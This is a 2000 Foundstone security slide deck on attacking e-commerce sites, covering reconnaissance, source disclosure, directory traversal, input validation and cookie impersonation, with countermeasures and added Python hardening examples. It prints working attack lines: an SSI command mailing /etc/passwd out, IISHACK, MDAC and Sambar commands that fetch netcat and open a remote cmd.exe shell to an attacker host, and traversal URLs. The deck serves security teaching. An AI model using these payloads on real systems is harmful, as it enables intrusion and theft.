Audit and Security of E-Commerce

The attacks are going up the stack.

Copyright 2000 Foundstone, Inc.

Stuart McClure, President/CTO, Foundstone, Inc.
http://www.foundstone.com
stuart.mcclure@foundstone.com
949-367-1743

Background

- President/CTO of Foundstone, Inc.
- Over 10 years in IT and security
- Lead author of “Hacking Exposed”
- Digital Battlefield columnist
- InfoWorld “Security Watch” columnist
- Former E&Y Security Consultant
- InfoWorld product analyst

Overview

- eCommerce Primer
- Information gathering
- Viewing Source
- Application design
- File System Traversal
- Input Validation
- Impersonation

Ecommerce Primer

“We're secure, we have a firewall”

eCommerce Primer
Ecommerce is built on web traffic (TCP port 80), which must be allowed through ecommerce firewalls. Firewalls therefore cannot block most of these attacks. To hack in this untamed world, knowledge of HTML, DHTML, VBScript, JScript, Java, JavaScript, Perl, CGI, Apache, IIS, Cold Fusion, CyberCash, ADO, MS Access, MDAC, MS SQL Server, and Oracle is helpful and often required.

Ecommerce Primer
ASCII Hex values: learn them, know them, live them

Character        Hex    Character        Hex    Character        Hex
Space            20     - (hyphen)       2D     Z                5A
!                21     . (period)       2E     [                5B
"                22     /                2F     \                5C
#                23     0                30     ]                5D
$                24     9                39     ^                5E
%                25     :                3A     _                5F
&                26     ;                3B     `                60
' (apostrophe)   27     <                3C     a                61
(                28     =                3D     z                7A
)                29     >                3E     {                7B
*                2A     ?                3F     |                7C
+                2B     @                40     }                7D
, (comma)        2C     A                41     ~                7E

eCommerce Primer
Most attackers look for the low hanging fruit first. They scan for web ports, search for vulnerable software or scripts, and then attack. The more sophisticated attacks require an in-depth knowledge of the inner workings of web scripts (all of which can be learned).

Information Gathering
Gather as much information about a site as possible to understand its purpose, its function and, most importantly, its design. Determine if any low-hanging fruit is available for picking.

Information Gathering
Methodology

- Web reconnaissance
- Vulnerability scanning
- Site duplication
- Keyword searching
- Email addresses
- External linkage
- Commented code
- Key field enumeration
- Scripting language enumeration

Information Gathering
Web reconnaissance

Enumerate a web server searching for every web application including alternate management servers, transaction applications, certificate servers, etc. Port scanning and enumeration will reveal volumes about the target systems.


Information Gathering
Web reconnaissance

Port scanning
- TCP and UDP ports 1-65535
- Common web ports: 80, 81, 88, 443, 2301, 2779, 8000, 8001, 8080, etc.

Information Gathering
Web reconnaissance

Port scanning
- Network Mapper (nmap) by Fyodor (http://www.insecure.org)

[/opt]# nmap -sT -n -P0 -p 80,88,8000,2799 192.168.51.210
Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, …)
Interesting ports on (192.168.51.210):
Port    State    Protocol    Service
2779    open     tcp         unknown

Information Gathering
Web reconnaissance

Port scanning
- SuperScan by Robin Keir (www.keir.net)

Information Gathering
Web reconnaissance

Enumeration
- Web server vendor and version
- Web server directory structure
- SSL web server vendor and version
- Web mind meld

Information Gathering
Web reconnaissance

Enumeration
- Netcat by Hobbit (http://www.l0pht.com/~weld)

The Swiss Army knife of hackers:
- TCP (both NT and Unix) and UDP (Unix only)
- Raw TCP or UDP connection
- Command/shell/program execution
- Source routing
- Port redirector
- Telnet server
- Port scanner

Information Gathering
Web reconnaissance

Enumeration
- Web server vendor and version with Netcat (nc)

[/opt]# nc 192.168.51.210 2779
HEAD / HTTP/1.0

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Sat, 26 Feb 2000 01:06:03 GMT
Content-Length: 3286
Content-Type: text/html

Information Gathering
Web reconnaissance

Enumeration
- Grinder 1.1 by Rhino9

Information Gathering
Web reconnaissance

Enumeration
- Hidden redirection

Using HTTP-EQUIV, web sites redirect visitors to other parts of the server or to other servers. An attacker can glean this information and use the newly discovered locations as targets for an attack.

Information Gathering
Web reconnaissance

Enumeration
- Netcat (nc) – HTTP-EQUIV discovery

C:\>nc www.site.com 80
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2000 23:21:52 GMT
Server: Microsoft-IIS/5.0
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<META HTTP-EQUIV ="Refresh" CONTENT = "0;URL=\\CDRIVE\WEB\INTRO.ASP">
</head>
<BODY bgcolor="#ffffff">
</BODY>
</HTML>

Information Gathering
Web reconnaissance

Enumeration
- Secure Sockets Layer (SSL)

Privacy protocol implementing symmetric key cryptography (DES, RC4), authentication (RSA, DSS), and message integrity (MD5, SHA). Transport Layer Security (TLS) is the latest version of SSL.

- OpenSSL/SSLeay

An open source toolkit for implementing SSL and TLS in applications.

Information Gathering
Web reconnaissance

Enumeration
- OpenSSL/SSLeay

SSLeay> s_client -connect www.ramsec.com:443
CONNECTED(00000003)
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://216.182.36.154/index.html
Date: Sat, 26 Feb 2000 00:59:07 GMT
Last-Modified: Thu, 10 Feb 2000 22:52:52 GMT
read:errno=0

Information Gathering
Vulnerability checking

Web vulnerability scanners check for known holes in application files and design.
- CGIscan by Bronc Buster (1998)
- Sitescan by Rhino9
- Whisker by Rain Forest Puppy (1999), http://www.wiretrip.net/rfp

Information Gathering
Vulnerability checking

Whisker (NT and Unix)

-- whisker / v1.3.0a / rain forest puppy / ADM / wiretrip --
Loaded script database of 1691 lines

= - = - = - = - = - =
= Host: www.hackingexposed.com
= Server: Apache/3.3.3 (Unix)

+ 404 Not Found:  GET /cfdocs/
+ 404 Not Found:  GET /cfide/Administrator/startstop.html
+ 404 Not Found:  GET /cfappman/index.cfm
+ 403 Forbidden:  GET /cgi-bin/
+ 404 Not Found:  GET /cgi-bin/dbmlparser.exe
+ 404 Not Found:  HEAD /cgi-bin/webdist.cgi
+ 404 Not Found:  HEAD /cgi-bin/handler
+ 404 Not Found:  HEAD /mall_log_files/order.log
+ 404 Not Found:  HEAD /PDG_Cart/
+ 404 Not Found:  HEAD /quikstore.cfg
+ 404 Not Found:  HEAD /orders/
+ 404 Not Found:  HEAD /Admin_files/order.log
+ 404 Not Found:  HEAD /bigconf.cgi

Information Gathering
Site duplication

Web spider programs
- Automatic web retriever and mirroring programs that follow every link, copying readable files such as .HTM, .HTML, .DHTML, .JHTML, .SHTML, .XML, etc.
- They do not retrieve .CGI, .ASP, .CFM or dynamically generated pages.

Manual searching
- View Source
- Save As

Information Gathering
Site duplication

Wget – Unix based, GNU Wget 1.5.3
- Standard on most Linux distributions, or download from http://www.freshmeat.org
- “non-interactive network retriever”
- HTTP and FTP retrieval
- Proxy support
- Authentication support
- Include/exclude list of URLs

Information Gathering
Wget

[/opt]# wget -r -m -v www.ramsec.com
--13:33:34--  http://www.ramsec.com:80/
           => `www.ramsec.com/index.html'
Connecting to www.ramsec.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 11,731 [text/html]

    0K -> ..........  .                                         [100%]

13:33:35 (25.57 KB/s) - `www.ramsec.com/index.html' saved [11731/11731]

Information Gathering
Site duplication

Teleport Pro 1.29 by Tennyson Maxwell Information Systems, Inc. (http://www.tenmax.com)
- Proxy support
- Authentication support
- Multi-threaded
- Advanced filters

Information Gathering
Teleport Pro results:


Information Gathering
Site duplication – Countermeasures

Garbage.cgi
- Rootshell once had an obscure link on its initial page which ran a CGI script that spat out endless amounts of data. This effectively tied up the web-pilfering program.

Information Gathering
Keyword searching

Searching web site code to find hidden treasures such as usernames, passwords, email addresses, external links, external images, etc.


Information Gathering
Keyword searching

With wget on Unix:
  grep "pass" *.html

Teleport Pro on NT:
  findstr "pass" *.html

Information Gathering
Email addresses

Searching a web site for email addresses can unearth usernames, external relationships, and points of attack.

Information Gathering
Email addresses

- Wget (offline)
- Teleport Pro (offline)
- Sam Spade (http://www.samspade.org)
  - Whois, ping, traceroute, ARIN, SMTP, finger, etc.
  - Online crawl website function!
- BlackWidow by SoftByteLabs.com

Information Gathering
Email addresses

wget

[/opt]# grep "@" *.html
index.html: For additional information, contact: </B></FONT><A HREF="mailto:info@ramsec.com"><FONT FACE="Tahoma,Verdana,Arial,Helvetica"><B>info@ramsec.com</B></FONT></A><FONT FACE="Tahoma,Verdana,Arial,Helvetica"> <BR></FONT>&nbsp;
index.html: HREF="mailto:webmaster@ramsec.com"><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">webmaster@ramsec.com</FONT></A><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </FONT><A

Information Gathering
Email addresses

Teleport Pro

D:\>findstr "@" *.htm?
about_us.html: HREF="mailto:webmaster@ramsec.com"><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">webmaster@ramsec.com</FONT> </A><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </FONT><A
consulting.html: HREF="mailto:webmaster@ramsec.com"><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">webmaster@ramsec.com</FONT> </A><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </FONT><A

Information Gathering
Email addresses

Sam Spade


Information Gathering
Email addresses

Black Widow


Information Gathering
External linkage

Links to web pages or graphics on systems other than the target. An external link can imply a relationship of sorts and provide alternate targets for the attacker.

Information Gathering
External linkage

Sam Spade


Information Gathering
Commented code

Searching for commented code can provide insight into the site's design, such as the applications and languages used, programming hints, etc.

Information Gathering
Commented code

Manual technique is most effective


Information Gathering
Key field enumeration

Determining the function of each field lets you exploit a vulnerability in how the web server parses that particular field. For example, if an ASP script did not adequately strip leading information from the id field, and a particular vulnerability existed in which ASP executed code based on an escape character, one could potentially insert something like “<escape code here>type%20\boot.ini” to type the boot.ini file on the remote system.

Information Gathering
Key field enumeration

Learn the name and type of key fields used in dynamic scripts (.CGI, .ASP, .CFM).

http://www.site.com/Login.asp?id=486&fu=http%3A%2F%2Fwww%2ESramsec%2Ecom%2Fdirectory%2FDefault%2Easp&cw=100&sf=0&kv=1&cc=9442568&Oi=1

id, fu, cw, sf, kv, cc and Oi are input fields to the login.asp script.

Information Gathering
Scripting language enumeration

Where applicable, determine the type of scripting language used (JavaScript, JScript, etc.). For example, the use of JavaScript can allow an attacker to trick users of the system into submitting confidential information such as passwords (e.g. the eBay hack).

Viewing Source
Numerous bugs or poor web designs allow an attacker to view web source code; for example, .ASP or .CGI code can be viewed within the browser. An attacker can discover the internal web design or, worse, internally used usernames and passwords for database access.

Viewing Source
Methodology

- Active Server Pages (ASP)
- Common Gateway Interface (CGI)
- ColdFusion Server (CFM)

Viewing Source
ASP vulnerabilities

Dot bug (1997)
- Affected IIS 3.0
- Using a trailing period (.) on ASP filenames allowed an attacker to view the source of the ASP script:

http://www.site.com/login.asp.

- Replacing the period (.) in the ASP filename allowed an attacker to view the source of the ASP script:

http://www.site.com/login%23asp

Viewing Source
ASP vulnerabilities

Dot bug
- Countermeasures
  - Upgrade to IIS 4.0 or above
  - Apply the IIS 3.0 patch: ftp://ftp.microsoft.com/bussys/IIS/iispublic/fixes/usa/security/fesrc-fix

Viewing Source
ASP vulnerabilities

Alternate Data Streams bug (1998)
- Affected IIS 3.0 and 4.0
- Allowed an attacker to view the “data” portion of an ASP script by addressing its DATA stream:

http://www.site.com/scripts/login.asp::$DATA

Viewing Source
ASP vulnerabilities

Alternate Data Streams bug
- Countermeasures
  - Remove read access on files for the Everyone group
  - Apply patches
    - For IIS 3.0: ftp://ftp.microsoft.com/bussys/IIS/iispublic/fixes/usa/security/iis3-datafix/
    - For IIS 4.0: ftp://ftp.microsoft.com/bussys/IIS/iispublic/fixes/usa/security

Viewing Source
Common Gateway Interface (CGI)

CGI design flaws
- CGIs that read and display an HTML file can be tricked into reading themselves and therefore displaying their own contents.

http://www.site.com/index.cgi?page=main.html

Can be changed to:

http://www.site.com/index.cgi?page=index.cgi

Viewing Source
ColdFusion Server

- By Allaire (www.allaire.com)
- Numerous bugs in 4.0 (1999)
  - Upload a file onto the web server: http://www.site.com/cfdocs/expeval/openfile.cfm
  - View a file on the web server with the Expression Evaluator: http://www.site.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log

Viewing Source
ColdFusion Server

Countermeasures
- Remove the scripts from the web server
- Apply the patch: http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full

File System Traversal
Vulnerabilities and misconfigurations may allow an attacker to gain unauthorized access to files and directories on the web server.

File System Traversal
Methodology

- Dot dot bugs
- Dot listings
- Tilde usage
- Compaq Insight Manager

File System Traversal
Dot dot bugs

A web server vulnerability which allows an attacker to escape the confines of the root directory and display system files. For example:

http://www.infoworld.com/get.cgi?../../../../../../etc/passwd

would display the passwd file on a vulnerable system.
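The dot dot bug above and the self-reading CGI from the Viewing Source section (index.cgi?page=index.cgi) share one root cause: a script opens whatever path the client names. This added example (my code, not anything from the deck) shows the check such a script needs: percent-decode, canonicalise with realpath, confirm the result is still inside the document root, and serve only static page types. The document root, its files and the `.html`/`.htm` allowlist are constructed for the demonstration.

```python
import os
import tempfile
from urllib.parse import unquote


class PathRejected(ValueError):
    """Raised for any page= value that must not be served."""


# Constructed document root: two static pages plus a stand-in for index.cgi,
# so the self-read case (page=index.cgi) can be exercised offline.
ROOT = tempfile.mkdtemp()
os.makedirs(os.path.join(ROOT, "docs"))
for name, body in {
    "main.html": "<h1>main</h1>",
    "docs/help.html": "<p>help</p>",
    "index.cgi": "#!/usr/bin/perl\n# a db password would typically sit here\n",
}.items():
    with open(os.path.join(ROOT, name), "w") as f:
        f.write(body)

ALLOWED_SUFFIXES = (".html", ".htm")  # assumed allowlist of static page types


def resolve_page(param, root=ROOT):
    """Map a user-supplied page= value to a file under root, or raise PathRejected.

    Order matters: percent-decode first (so %2e%2e%2f is seen as ../), then
    canonicalise with realpath (collapses ../ and symlinks), then check that the
    result is still inside root and is a static page rather than a script."""
    raw = unquote(param)
    if "\x00" in raw or os.path.isabs(raw) or raw.startswith("\\"):
        raise PathRejected("absolute path or NUL byte")
    root_real = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root_real, raw))
    if os.path.commonpath([root_real, full]) != root_real:
        raise PathRejected("escapes document root")
    if not full.lower().endswith(ALLOWED_SUFFIXES):
        raise PathRejected("not a static page (scripts are never served as text)")
    if not os.path.isfile(full):
        raise PathRejected("no such page")
    return full


def serve_page(param):
    """What index.cgi should do: read only what resolve_page approved."""
    with open(resolve_page(param)) as f:
        return f.read()


def is_rejected(param):
    """True when resolve_page refuses the value (used for the checks below)."""
    try:
        resolve_page(param)
        return False
    except PathRejected:
        return True


if __name__ == "__main__":
    for p in ("main.html", "docs%2Fhelp.html", "index.cgi",
              "../../../../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(f"{p!r:40} -> {'rejected' if is_rejected(p) else 'served'}")
```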

File System Traversal
Dot listings

A web server misconfiguration or vulnerability which allows an attacker to display the current directory's file listing. For example, Novell's GroupWise Web Gateway web server allows a virtual directory to be listed:

http://www.infoworld.com/us/.

File System Traversal
Tilde usage

A web server vulnerability allowing an attacker to escape the root directory of the web server and view the contents of a particular user's directory on the system. For example, the following might display the contents of the root user's directory:

http://www.infoworld.com/~root/

File System Traversal
Compaq Insight Manager (CIM)

- Re-discovered in 1999
- The CIM web server allowed an attacker to exploit the dot dot command in a browser to download any file on the system
- A good test to determine if a system is vulnerable is to look for C:\BOOT.INI

Input Validation
Web applications can often be tricked into accepting invalid input for processing, making them cough up sensitive information or, worse, crashing the application.

Input Validation
Methodology

- Metacharacters
- Field overflows
- Application buffer overflows
- Hex character replacement
- Server side includes (SSI)
- Hidden tags
- Server side debugging
- Extending Javascript
- Data access bypassing
- Local command execution

Input Validation
Metacharacters

Depending on the input sanitation being performed on the server, it may be possible to submit metacharacters as a parameter and get the server to return unexpected results. For example:

http://www.site.com/login.cgi?..&&&&&&&&&

may actually choke the web server or produce debugging information.

Input Validation
Field overflows

Poor field length checking may allow an attacker to submit a large character field, causing unexpected results or sometimes crashing the server (use with caution).

Input Validation
Field overflows

Hidden tag SIZE


Input Validation
Field overflows

Hidden tag SUBMIT


Input Validation
Field overflows

Unexpected results


Input Validation
Application buffer overflows

IISHACK by eEye (www.eeye.com)
- Affected IIS 4.0, SP4 or SP5
- Allowed an attacker to send a large string to IIS and overflow .HTR, .STM, and .IDC files, overflowing the machine's stack.
- The overflow would then execute the commands given.

Input Validation
Application buffer overflows

IISHACK
- iishack.exe (program containing the buffer overflow and initial instructions to download the ncx.exe file to be executed).
- ncx.exe (slim version of Netcat executing a command shell on port 80).

Input Validation
Application buffer overflows

IISHACK (how to exploit)
- Set up a web server with ncx.exe in the root directory.
- Run iishack.exe:

C:\NT\>iishack 192.168.51.1 80 10.1.1.1/ncx.exe

- Connect to port 80 on the target:

C:\NT\>nc 192.168.51.1 80
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\>

Input Validation
Application buffer overflows

IISHACK countermeasure
- Apply the IIS 4.0 patch: ftp://ftp.microsoft.com/bussys/IIS/iispublic/fixes/usa/ext-fix/

Input Validation
Hex character replacement

Replacing ASCII characters with their hexadecimal encoding can bypass some IDSs looking for key strings, and it may bypass initial script parsing for invalid or escape characters such as the back tick (` or %60) and ampersand (& or %26), allowing an attacker to execute commands locally and/or receive back unexpected results.

Input Validation
Hex character replacement

ASCII characters can be replaced by hexadecimal to bypass initial script parsing and intrusion detection products.

Initial URL:
http://www.site.com/login.cgi?id=889&name=stu&password=10asd9as

Gets changed to:
http://www.site.com/login.cgi?id=889%26name=stu%26password=10asd9as
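Why the %26 rewrite above works, and how a script closes the hole, comes down to ordering: a filter that inspects the query before decoding never sees the ampersand, and a parser that decodes the whole query before splitting turns %26 into a separator. This added example (mine, not the deck's) takes the two query strings from the slide and contrasts the buggy and correct orderings; the `FORBIDDEN` set is an assumed list built from the metacharacters the slides mention.

```python
from urllib.parse import unquote

# The two query strings from the slide above.
INITIAL = "id=889&name=stu&password=10asd9as"
ENCODED = "id=889%26name=stu%26password=10asd9as"

# Assumed set of characters that must never reach a shell or a parser unescaped.
FORBIDDEN = set("`&|;<>$\n\r")


def raw_filter_passes(query):
    """Pre-decode filter applied to each raw pair: catches a literal backtick but
    not %60, and cannot see the '&' hiding inside %26."""
    return not any(c in FORBIDDEN for pair in query.split("&") for c in pair)


def decode_then_split(query):
    """The bug: decode the whole query first, then split on '&'.
    %26 now acts as a separator and smuggles extra parameters in."""
    params = {}
    for pair in unquote(query).split("&"):
        key, _, value = pair.partition("=")
        params[key] = value
    return params


def split_then_decode(query):
    """The fix: split on the raw '&' first, then decode each part exactly once."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def canonical(value, max_rounds=3):
    """Percent-decode until stable, so a doubly encoded value (%2526) is seen as
    the '&' it really is; refuse values nested deeper than max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many encoding layers")


def vetted_params(query):
    """Parse correctly, then check every *decoded* value; return the params or
    raise ValueError naming the offending field."""
    params = split_then_decode(query)
    for key, value in params.items():
        if any(c in FORBIDDEN for c in canonical(value)):
            raise ValueError(f"metacharacter in field {key!r}")
    return params


def vet(query):
    """Convenience wrapper: None when the query is clean, else the error text."""
    try:
        vetted_params(query)
        return None
    except ValueError as e:
        return str(e)


if __name__ == "__main__":
    print(decode_then_split(ENCODED))   # three fields: the filter bypass worked
    print(split_then_decode(ENCODED))   # one field holding a literal '&'
    print(vet(ENCODED), vet("cmd=%60id%60"))
```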

Input Validation
Server side includes (SSI)

Allows commands to be executed locally on the system. For example, on a Unix web server allowing SSIs you can use the following command to mail the /etc/passwd file to yourself:

<!--#exec cmd="mail me@my.org < cat /etc/passwd"-->

Input Validation
Hidden tags

HTML hidden tags are frequently used to store session information such as price, quantity, and purchase item. These hidden tags can be modified and resubmitted, and if no backend checking is performed, a product can be purchased for a much reduced price (e.g. a BMW for the cost of a matchbox car).
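The hidden-tag problem above is fixed on the backend, not in the form: the server recomputes the total from its own catalogue and treats a submitted price that disagrees as evidence of tampering. This added example (not from the deck or any product) parses a constructed order form, shows the flawed total that trusts the client, and the hardened total that does not; the catalogue, item names and prices are invented.

```python
from decimal import Decimal, InvalidOperation
from html.parser import HTMLParser

# Constructed server-side catalogue: the only price source the checkout trusts.
CATALOG = {"bmw-z3": Decimal("35000.00"), "matchbox-car": Decimal("1.99")}

# Constructed order form of the kind the slide describes: the price travels in a
# hidden field that any user can edit before resubmitting.
ORDER_FORM = """
<form action="/checkout" method="post">
  <input type="hidden" name="item" value="bmw-z3">
  <input type="hidden" name="price" value="35000.00">
  <input type="hidden" name="qty" value="1">
  <input type="submit" value="Buy">
</form>
"""


class HiddenFieldParser(HTMLParser):
    """Collects name=value for every <input type="hidden">."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and attrs.get("type") == "hidden" and "name" in attrs:
            self.fields[attrs["name"]] = attrs.get("value", "")


def hidden_fields(html):
    parser = HiddenFieldParser()
    parser.feed(html)
    return parser.fields


def total_trusting_client(form):
    """The flawed backend: believes whatever price the form carried."""
    return Decimal(form["price"]) * int(form["qty"])


def total_from_catalog(form):
    """The hardened backend: price comes from the catalogue, quantity is bounded,
    and the submitted price is compared only to detect a modified form."""
    item = form.get("item")
    if item not in CATALOG:
        raise ValueError("unknown item")
    try:
        qty = int(form.get("qty", ""))
        submitted = Decimal(form.get("price", ""))
    except (ValueError, InvalidOperation):
        raise ValueError("malformed quantity or price")
    if not 1 <= qty <= 99:
        raise ValueError("quantity out of range")
    if submitted != CATALOG[item]:
        # Worth logging: a mismatch here is an edited form, not a rounding issue.
        raise ValueError(f"price tampering: {submitted} != {CATALOG[item]}")
    return CATALOG[item] * qty


def price_tampered(form):
    """True only for the tampering case, not for other malformed input."""
    try:
        total_from_catalog(form)
        return False
    except ValueError as e:
        return str(e).startswith("price tampering")


if __name__ == "__main__":
    fields = hidden_fields(ORDER_FORM)
    edited = dict(fields, price="1.99")
    print("trusting client:", total_trusting_client(edited))
    print("tampered:", price_tampered(edited), "catalogue total:", total_from_catalog(fields))
```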

Input Validation
Server side debugging

Server side application debugging features may allow additional information to be leaked about the script's function, for example:

http://www.domain.com/cgi-bin/script.cgi?debug=ON (or debug=TRUE)

Input Validation
Extending Javascript

Sites that allow users to input information onto the site without checking for JavaScript content can allow attackers to insert JavaScript code to prompt users for sensitive information. For example, a recent eBay hack was accomplished by inserting JavaScript code into the description of an auction item. When users selected the description they were prompted to enter their online userid and password, which were sent to the attacker.

Input Validation
Local command execution

Vulnerabilities in web server, script parameter processing, or rogue files may allow an attacker to execute local commands on the affected systems.


Input Validation
Local command execution

MDAC
- IIS's MDAC component has a vulnerability where an attacker can submit commands for local execution.
- Exploit written by Rain Forest Puppy (RFP)
- Exploit and fix can be found at www.wiretrip.net/rfp

Input Validation
Local command execution

MDAC – detecting vulnerable systems

C:\>nc -nvv -w 2 192.168.51.1 80
GET /msadc/msadcs.dll HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 19 Dec 1999 18:32:10 GMT
Content-Type: application/x-varg
Content-Length: 6

Input Validation
Local command execution

MDAC – sending the exploit

C:\>mdac.pl -h 192.168.51.1 -t 192.168.51.102 -i 192.168.51.102 -p 44444
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Command: cmd /c cd %SystemRoot%&&tftp -i 192.168.51.102 GET nc.exe nc.exe&&del ftptmp && attrib -r nc.exe && PROMPT=hacked $p$g && nc.exe -e cmd.exe 192.168.51.102 44444
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: Success!

Input Validation
Local command execution

MDAC – getting the prompt

C:\>nc -l -p 44444

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

hacked C:\WINNT>

Input validation
Local command execution

Sambar CGI vulnerability (2/23/00)
- Batch files in cgi-bin allow local command execution
  - Hello.bat
  - Echo.bat

Input validation
Local command execution

Sambar hack

http://www.site.com/cgi-bin/hello.bat?&tftp%20-i%20GET%20nc.exe%20c:\temp\nc.exe&c:\nc.exe%20-L%20-p%204000%20-e%20cmd.exe

Impersonation
Impersonating another web user can be accomplished by understanding the way authentication is performed on the server.


Impersonation
Methodology

- Determine state tracking
- Attempt to reverse engineer the cookie encryption method
- Spoof cookies to impersonate a user

Impersonation
Determine state tracking

All ecommerce sites must track a user's state in some manner. TCP (and therefore HTTP) is, by its nature, stateless, making it difficult to associate web requests with an individual. The cookie is the solution.

Impersonation
Determine state tracking

Cookies allow a web developer to “track” and “remember” a user while shopping by inserting information into the cookie file.

Netscape:
C:\PROGRAM FILES\NETSCAPE\USERS\DEFAULT\COOKIE.TXT

IE:
C:\WINNT\PROFILES\ADMINISTRATOR\COOKIES

Impersonation
Determine state tracking

Cookie breakdown
- Netscape:

.wsj.com TRUE / FALSE 1293840044 WSJIE_LOGIN igCOEhEDCsCoCUCIKtKGKbKPAqAtAABhDDFNDqDNFaFKGrHfGIHrFDGYMi

- IE:

user_type subscribed wsj.com/ 0 3567004032 30124358 1548272224 29327756 *

Impersonation
Determine state tracking

Cookie Pal by Kookaburra Software (http://www.kburra.com/)


Impersonation
Determine state tracking

Reverse engineer the cookie state information and you will be able to make purchases as someone else. It is often based on a combination of name, password, date, time, IP address or some other relevant data, usually under some form of XOR or DES encryption.
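The XOR-style cookie the slide describes fails not because the key is easy to find but because nothing on the server can tell a genuine cookie from an altered one. This added example (my construction, not the deck's or any vendor's scheme) puts a fixed-key XOR cookie next to a cookie carrying its state in the clear with an HMAC-SHA256 tag and an expiry, and shows that the first accepts any modification while the second rejects it. Both keys are constructed for the demonstration.

```python
import hashlib
import hmac
import time

# Constructed keys for the demonstration. Assumption: in production they live in
# a secret store and the HMAC key is rotated, never embedded in code.
XOR_KEY = bytes.fromhex("5a3c9e1742d108662bf0917d33a4c80f")
HMAC_KEY = b"constructed-example-hmac-key"


def xor_bytes(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# --- Weak scheme: the state string XORed with a fixed key, as the slide describes.
def issue_xor_cookie(user_id, now=None):
    ts = int(now if now is not None else time.time())
    return xor_bytes(f"user={user_id};ts={ts}".encode(), XOR_KEY).hex()


def read_xor_cookie(cookie):
    """Server side: decrypt and parse. Nothing here can notice a modified cookie;
    whatever bytes arrive decrypt to *some* state and are acted on."""
    state = xor_bytes(bytes.fromhex(cookie), XOR_KEY).decode(errors="replace")
    return dict(kv.split("=", 1) for kv in state.split(";") if "=" in kv)


# --- Hardened scheme: state in the clear plus an HMAC-SHA256 tag and an expiry.
def issue_signed_cookie(user_id, now=None, ttl=3600):
    exp = int(now if now is not None else time.time()) + ttl
    state = f"user={user_id};exp={exp}"
    tag = hmac.new(HMAC_KEY, state.encode(), hashlib.sha256).hexdigest()
    return f"{state}|{tag}"


def verify_signed_cookie(cookie, now=None):
    """Return the parsed state, or None if the tag is wrong or the cookie expired."""
    state, sep, tag = cookie.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(HMAC_KEY, state.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        return None
    fields = dict(kv.split("=", 1) for kv in state.split(";") if "=" in kv)
    current = now if now is not None else time.time()
    if int(fields.get("exp", 0)) < current:
        return None
    return fields


if __name__ == "__main__":
    weak = issue_xor_cookie("stu", now=1_000_000)
    altered = weak[:10] + ("0" if weak[10] != "0" else "1") + weak[11:]  # one byte changed in transit
    print("xor cookie, altered, still accepted as:", read_xor_cookie(altered))
    strong = issue_signed_cookie("stu", now=1_000_000)
    print("signed cookie, edited:", verify_signed_cookie(strong.replace("stu", "admin"), now=1_000_100))
```

The XOR key only has to stay secret for confidentiality; integrity needs the tag, and the tag must be checked with a constant-time compare.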

Wrap-up
Overview

- Background and Primer
- Information gathering
- Viewing Source
- Application design
- File System Traversal
- Input Validation
- Impersonation